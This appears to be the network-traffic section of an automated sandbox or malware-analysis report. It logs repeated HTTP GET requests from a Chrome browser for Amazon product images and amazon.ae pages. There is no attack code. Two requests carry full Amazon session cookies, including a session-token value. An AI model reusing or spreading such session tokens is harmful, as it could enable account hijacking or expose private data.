Source: global trafficHTTP traffic detected: GET /images/I/51CMwGv20cL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71JxdOlrA8L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/916ke72wlWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61pYmhJ35NL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51Y2nTHMPOL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61uHnzEtCWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51ZkRPS4DeL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61w4625ZvTL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71wrHWIyZ2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71c2DCsZCJS._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61bEqTU3cQL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51CMwGv20cL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61uHnzEtCWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61w4625ZvTL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51ZkRPS4DeL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61lg6N3qjvL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71wrHWIyZ2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71ikPCHuz3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/x6ok$LYiGGUKJXl.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31ulQWhB89L._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41A1Lpkr9HL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61bEqTU3cQL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61JiCrojGSL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61lg6N3qjvL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/x6ok$LYiGGUKJXl.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71ikPCHuz3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31ulQWhB89L._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41A1Lpkr9HL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51W4KUiHQaL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51xcYRwPP0L._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51YnNha37vL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Id2i6D-rL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41gRz4miKkL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61JiCrojGSL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ref=nav_logo HTTP/1.1Host: www.amazon.aeConnection: keep-alivedevice-memory: 8sec-ch-device-memory: 8dpr: 1sec-ch-dpr: 1viewport-width: 1280sec-ch-viewport-width: 1280rtt: 300downlink: 1.55ect: 3gsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469020355&tb:C37SFEY0GDXEZ5HDEVRN+s-C37SFEY0GDXEZ5HDEVRN|1723469020355
Source: global trafficHTTP traffic detected: GET /images/I/31Id2i6D-rL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51xcYRwPP0L._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51W4KUiHQaL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41gRz4miKkL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51YnNha37vL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Lxe89wp8L._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/416l24m+1oL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /service-worker.js HTTP/1.1Host: www.amazon.aeConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.amazon.ae/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469020355&tb:C37SFEY0GDXEZ5HDEVRN+s-C37SFEY0GDXEZ5HDEVRN|1723469020355
Source: global trafficHTTP traffic detected: GET /images/I/416l24m+1oL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Lxe89wp8L._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
